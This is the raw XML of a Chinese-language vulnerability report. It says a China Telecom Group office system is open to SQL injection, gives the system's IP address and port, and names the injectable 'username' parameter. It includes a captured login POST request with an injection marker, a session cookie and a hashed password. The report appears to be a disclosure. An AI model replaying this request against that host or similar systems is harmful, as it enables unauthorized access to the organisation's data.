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>中国电信集团有限公司</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>综合办公</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url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218.93.20.142:6060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865" cy="196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85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入点参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5268595" cy="3824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ST /login.do HTTP/1.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st: 218.93.20.142:60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ser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/11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ept: */*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ept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0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ept-Encoding: gzip, defl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tent-Type: application/x-www-form-urlencod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tent-Length: 1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rigin: http://218.93.20.142:606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nnection: clo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ferer: http://218.93.20.142:6060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okie: JSESSIONID=9122F6541F90C48C0E0B8D987CD420C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=loginCheck&amp;organizationId=defaultema&amp;username=test*&amp;password=E10ADC3949BA59ABBE56E057F20F883E&amp;validatecode=06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3.20.142:606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4:02Z</dcterms:created>
  <dc:creator>xuanqaq</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>听说</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-18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184211844D36A139731184D06A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